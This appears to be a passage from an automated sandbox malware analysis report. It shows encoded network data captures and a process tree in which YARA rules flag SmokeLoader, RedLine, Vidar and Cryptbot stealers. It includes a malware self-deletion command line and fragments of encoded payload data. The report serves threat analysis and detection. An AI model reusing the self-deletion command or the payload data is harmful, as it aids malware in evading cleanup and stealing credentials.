                                                                                                                                                                                Data Ascii: LQTFBWUFBUWdTZ1FrSUFBUUJIUVVJR0FnRkFBSUNHQmdOQUFRUmd1RU9EaEdDNVJHQzZRY2dBZ0VUQUJNQkJRQUFFb0lWR2djSkNCSjlGUkU1QVJLQkFCS0JBQkpWRW
                                                                                                                                                                                2021-12-01 09:04:36 UTC348INData Raw: 00 42 00 51 00 56 00 56 00 33 00 51 00 6a 00 42 00 42 00 52 00 30 00 56 00 42 00 5a 00 45 00 46 00 43 00 62 00 45 00 46 00 42 00 51 00 55 00 46 00 56 00 51 00 55 00 4a 00 35 00 51 00 55 00 63 00 34 00 51 00 56 00 6c 00 33 00 51 00 6d 00 78 00 42 00 53 00 45 00 31 00 42 00 59 00 33 00 64 00 43 00 53 00 6b 00 46 00 48 00 55 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 31 00 52 00 51 00 58 00 46 00 42 00 51 00 7a 00 52 00 42 00 54 00 56 00 46 00 43 00 63 00 30 00 46 00 45 00 52 00 55 00 46 00 61 00 51 00 55 00 46 00 34 00 51 00 55 00 64 00 4a 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 56 00 55 00 46 00 43 00 65 00 55 00 46 00 48 00 4f 00 45 00 46 00 61 00 5a 00 30 00 4a 00 77 00 51 00 55 00
                                                                                                                                                                                Data Ascii: BQVV3QjBBR0VBZEFCbEFBQUFVQUJ5QUc4QVl3QmxBSE1BY3dCSkFHUUFBQUFBQUFBQU1RQXFBQzRBTVFCc0FERUFaQUF4QUdJQUFBQUFBQUFBVUFCeUFHOEFaZ0JwQU
                                                                                                                                                                                2021-12-01 09:04:36 UTC364INData Raw: 00 4a 00 51 00 55 00 35 00 42 00 51 00 6b 00 78 00 42 00 52 00 6d 00 39 00 42 00 59 00 6c 00 46 00 42 00 4d 00 55 00 46 00 49 00 56 00 55 00 46 00 58 00 5a 00 30 00 4a 00 59 00 51 00 55 00 64 00 52 00 51 00 57 00 52 00 33 00 51 00 6d 00 68 00 42 00 52 00 57 00 4e 00 42 00 5a 00 55 00 46 00 43 00 4d 00 6b 00 46 00 47 00 61 00 30 00 46 00 69 00 55 00 55 00 4a 00 33 00 51 00 55 00 64 00 7a 00 51 00 56 00 6c 00 33 00 51 00 6b 00 68 00 42 00 53 00 46 00 46 00 42 00 59 00 6e 00 64 00 43 00 59 00 55 00 46 00 47 00 59 00 30 00 46 00 55 00 5a 00 30 00 4a 00 76 00 51 00 55 00 64 00 4e 00 51 00 56 00 4a 00 33 00 51 00 6a 00 42 00 42 00 53 00 45 00 46 00 42 00 57 00 56 00 46 00 43 00 64 00 45 00 46 00 49 00 51 00 55 00 46 00 68 00 64 00 30 00 4a 00 6f 00 51 00 55 00
                                                                                                                                                                                Data Ascii: JQU5BQkxBRm9BYlFBMUFIVUFXZ0JYQUdRQWR3QmhBRWNBZUFCMkFGa0FiUUJ3QUdzQVl3QkhBSFFBYndCYUFGY0FUZ0JvQUdNQVJ3QjBBSEFBWVFCdEFIQUFhd0JoQU
                                                                                                                                                                                2021-12-01 09:04:36 UTC380INData Raw: 00 42 00 51 00 54 00 52 00 42 00 5a 00 30 00 46 00 42 00 51 00 55 00 46 00 44 00 51 00 57 00 64 00 42 00 64 00 32 00 64 00 6e 00 61 00 6c 00 42 00 43 00 5a 00 32 00 74 00 78 00 61 00 47 00 74 00 70 00 52 00 7a 00 6c 00 33 00 4d 00 45 00 4a 00 43 00 64 00 30 00 74 00 6e 00 5a 00 32 00 64 00 71 00 51 00 55 00 31 00 4a 00 53 00 55 00 6c 00 32 00 51 00 55 00 6c 00 43 00 51 00 56 00 52 00 46 00 54 00 45 00 31 00 42 00 61 00 30 00 64 00 43 00 55 00 33 00 4e 00 50 00 51 00 58 00 64 00 4a 00 59 00 55 00 4a 00 52 00 51 00 58 00 64 00 55 00 51 00 56 00 6c 00 4c 00 53 00 33 00 64 00 5a 00 51 00 6b 00 4a 00 42 00 52 00 30 00 4e 00 4f 00 64 00 30 00 6c 00 43 00 51 00 6b 00 74 00 42 00 4b 00 30 00 31 00 45 00 64 00 33 00 64 00 47 00 64 00 31 00 6c 00 4c 00 53 00 33 00
                                                                                                                                                                                Data Ascii: BQTRBZ0FBQUFDQWdBd2dnalBCZ2txaGtpRzl3MEJCd0tnZ2dqQU1JSUl2QUlCQVRFTE1Ba0dCU3NPQXdJYUJRQXdUQVlLS3dZQkJBR0NOd0lCQktBK01Ed3dGd1lLS3


                                                                                                                                                                                Code Manipulations

                                                                                                                                                                                Statistics

                                                                                                                                                                                Behavior

                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                System Behavior

                                                                                                                                                                                Analysis Process: QMn13jz6nj.exe PID: 2228 Parent PID: 5780

                                                                                                                                                                                General

                                                                                                                                                                                Start time:10:03:38
                                                                                                                                                                                Start date:01/12/2021
                                                                                                                                                                                Path:C:\Users\user\Desktop\QMn13jz6nj.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\QMn13jz6nj.exe"
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                File size:162304 bytes
                                                                                                                                                                                MD5 hash:C6E5298F945F91851744F96EE16412E5
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                Analysis Process: QMn13jz6nj.exe PID: 3416 Parent PID: 2228

                                                                                                                                                                                General

                                                                                                                                                                                Start time:10:03:39
                                                                                                                                                                                Start date:01/12/2021
                                                                                                                                                                                Path:C:\Users\user\Desktop\QMn13jz6nj.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\QMn13jz6nj.exe"
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                File size:162304 bytes
                                                                                                                                                                                MD5 hash:C6E5298F945F91851744F96EE16412E5
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000002.374208740.00000000005A1000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000002.374186262.0000000000580000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                Analysis Process: explorer.exe PID: 3352 Parent PID: 3416

                                                                                                                                                                                General

                                                                                                                                                                                Start time:10:03:46
                                                                                                                                                                                Start date:01/12/2021
                                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                Imagebase:0x7ff720ea0000
                                                                                                                                                                                File size:3933184 bytes
                                                                                                                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000000.353435896.0000000004E91000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                Reputation:high

                                                                                                                                                                                Analysis Process: ddigjgj PID: 6700 Parent PID: 664

                                                                                                                                                                                General

                                                                                                                                                                                Start time:10:04:26
                                                                                                                                                                                Start date:01/12/2021
                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\ddigjgj
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\ddigjgj
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                File size:162304 bytes
                                                                                                                                                                                MD5 hash:C6E5298F945F91851744F96EE16412E5
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                Analysis Process: ddigjgj PID: 6464 Parent PID: 6700

                                                                                                                                                                                General

                                                                                                                                                                                Start time:10:04:29
                                                                                                                                                                                Start date:01/12/2021
                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\ddigjgj
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\ddigjgj
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                File size:162304 bytes
                                                                                                                                                                                MD5 hash:C6E5298F945F91851744F96EE16412E5
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.435228556.0000000000530000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.435588764.00000000006B1000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                Analysis Process: A70A.exe PID: 3340 Parent PID: 3352

                                                                                                                                                                                General

                                                                                                                                                                                Start time:10:04:29
                                                                                                                                                                                Start date:01/12/2021
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\A70A.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\A70A.exe
                                                                                                                                                                                Imagebase:0x12e0000
                                                                                                                                                                                File size:1285856 bytes
                                                                                                                                                                                MD5 hash:31F17AD58D02772DF14EFAC37D416CD7
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.573313266.00000000012E2000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                • Detection: 26%, Metadefender, Browse
                                                                                                                                                                                • Detection: 57%, ReversingLabs
                                                                                                                                                                                Reputation:moderate

                                                                                                                                                                                Analysis Process: C169.exe PID: 6276 Parent PID: 3352

                                                                                                                                                                                General

                                                                                                                                                                                Start time:10:04:36
                                                                                                                                                                                Start date:01/12/2021
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\C169.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\C169.exe
                                                                                                                                                                                Imagebase:0x900000
                                                                                                                                                                                File size:397824 bytes
                                                                                                                                                                                MD5 hash:5115E5DAB211559A85CD0154E8100F53
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000010.00000002.499816087.0000000003BB1000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000010.00000002.499816087.0000000003BB1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                • Detection: 37%, Metadefender, Browse
                                                                                                                                                                                • Detection: 79%, ReversingLabs
                                                                                                                                                                                Reputation:moderate

                                                                                                                                                                                Analysis Process: conhost.exe PID: 4788 Parent PID: 6276

                                                                                                                                                                                General

                                                                                                                                                                                Start time:10:04:37
                                                                                                                                                                                Start date:01/12/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7f20f0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high

                                                                                                                                                                                Analysis Process: D466.exe PID: 6636 Parent PID: 3352

                                                                                                                                                                                General

                                                                                                                                                                                Start time:10:04:40
                                                                                                                                                                                Start date:01/12/2021
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\D466.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\D466.exe
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                File size:163328 bytes
                                                                                                                                                                                MD5 hash:DF13FAC0D8B182E4D8B9A02BA87A9571
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                • Detection: 29%, Metadefender, Browse
                                                                                                                                                                                • Detection: 51%, ReversingLabs
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                Analysis Process: AA02.exe PID: 5976 Parent PID: 3352

                                                                                                                                                                                General

                                                                                                                                                                                Start time:10:04:44
                                                                                                                                                                                Start date:01/12/2021
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\AA02.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\AA02.exe
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                File size:351744 bytes
                                                                                                                                                                                MD5 hash:349A409711C0A8F53C5F90A993A621F2
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.528038196.00000000008A5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000016.00000002.528038196.00000000008A5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                Analysis Process: C169.exe PID: 2256 Parent PID: 6276

                                                                                                                                                                                General

                                                                                                                                                                                Start time:10:04:44
                                                                                                                                                                                Start date:01/12/2021
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\C169.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\C169.exe
                                                                                                                                                                                Imagebase:0x990000
                                                                                                                                                                                File size:397824 bytes
                                                                                                                                                                                MD5 hash:5115E5DAB211559A85CD0154E8100F53
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000017.00000000.476958517.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000017.00000000.466738621.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000017.00000002.568172041.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000017.00000000.471013875.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000017.00000000.472952857.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                Reputation:moderate

                                                                                                                                                                                Analysis Process: B6B5.exe PID: 6720 Parent PID: 3352

                                                                                                                                                                                General

                                                                                                                                                                                Start time:10:04:47
                                                                                                                                                                                Start date:01/12/2021
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\B6B5.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\B6B5.exe
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                File size:336896 bytes
                                                                                                                                                                                MD5 hash:CBC4BD8906093C0CCC55379319D65DB1
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                Analysis Process: D375.exe PID: 6632 Parent PID: 3352

                                                                                                                                                                                General

                                                                                                                                                                                Start time:10:04:56
                                                                                                                                                                                Start date:01/12/2021
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\D375.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\D375.exe
                                                                                                                                                                                Imagebase:0x8e0000
                                                                                                                                                                                File size:2740224 bytes
                                                                                                                                                                                MD5 hash:CA16CA4AA9CF9777274447C9F4BA222E
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000003.478772499.00000000008C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_Cryptbot, Description: Yara detected Cryptbot, Source: 0000001A.00000003.478772499.00000000008C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.570490408.0000000000915000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_Cryptbot, Description: Yara detected Cryptbot, Source: 0000001A.00000002.570490408.0000000000915000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                • Detection: 43%, Metadefender, Browse
                                                                                                                                                                                • Detection: 86%, ReversingLabs
                                                                                                                                                                                Reputation:moderate

                                                                                                                                                                                Analysis Process: WerFault.exe PID: 6708 Parent PID: 6636

                                                                                                                                                                                General

                                                                                                                                                                                Start time:10:04:56
                                                                                                                                                                                Start date:01/12/2021
                                                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6636 -s 520
                                                                                                                                                                                Imagebase:0x1390000
                                                                                                                                                                                File size:434592 bytes
                                                                                                                                                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high

                                                                                                                                                                                Analysis Process: B6B5.exe PID: 3540 Parent PID: 6720

                                                                                                                                                                                General

                                                                                                                                                                                Start time:10:05:02
                                                                                                                                                                                Start date:01/12/2021
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\B6B5.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\B6B5.exe
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                File size:336896 bytes
                                                                                                                                                                                MD5 hash:CBC4BD8906093C0CCC55379319D65DB1
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001C.00000002.503480050.00000000005B1000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001C.00000002.503274211.00000000004A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                Analysis Process: EE61.exe PID: 5680 Parent PID: 3352

                                                                                                                                                                                General

                                                                                                                                                                                Start time:10:05:03
                                                                                                                                                                                Start date:01/12/2021
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\EE61.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\EE61.exe
                                                                                                                                                                                Imagebase:0xb60000
                                                                                                                                                                                File size:1143000 bytes
                                                                                                                                                                                MD5 hash:97617914D6E8A6E3CBEE8A5E5FF39AA5
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:.Net C# or VB.NET

                                                                                                                                                                                Analysis Process: cmd.exe PID: 4340 Parent PID: 5976

                                                                                                                                                                                General

                                                                                                                                                                                Start time:10:05:23
                                                                                                                                                                                Start date:01/12/2021
                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\AA02.exe" & exit
                                                                                                                                                                                Imagebase:0xd80000
                                                                                                                                                                                File size:232960 bytes
                                                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                Analysis Process: EE61.exe PID: 5344 Parent PID: 5680

                                                                                                                                                                                General

                                                                                                                                                                                Start time:10:05:24
                                                                                                                                                                                Start date:01/12/2021
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\EE61.exe
                                                                                                                                                                                Wow64 process (32bit):
                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\EE61.exe
                                                                                                                                                                                Imagebase:
                                                                                                                                                                                File size:1143000 bytes
                                                                                                                                                                                MD5 hash:97617914D6E8A6E3CBEE8A5E5FF39AA5
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                Analysis Process: conhost.exe PID: 3428 Parent PID: 4340

                                                                                                                                                                                General

                                                                                                                                                                                Start time:10:05:24
                                                                                                                                                                                Start date:01/12/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7f20f0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                Analysis Process: timeout.exe PID: 1904 Parent PID: 4340

                                                                                                                                                                                General

                                                                                                                                                                                Start time:10:05:25
                                                                                                                                                                                Start date:01/12/2021
                                                                                                                                                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:timeout /t 5
                                                                                                                                                                                Imagebase:0xc90000
                                                                                                                                                                                File size:26112 bytes
                                                                                                                                                                                MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                Disassembly

                                                                                                                                                                                Code Analysis

                                                                                                                                                                                Reset < >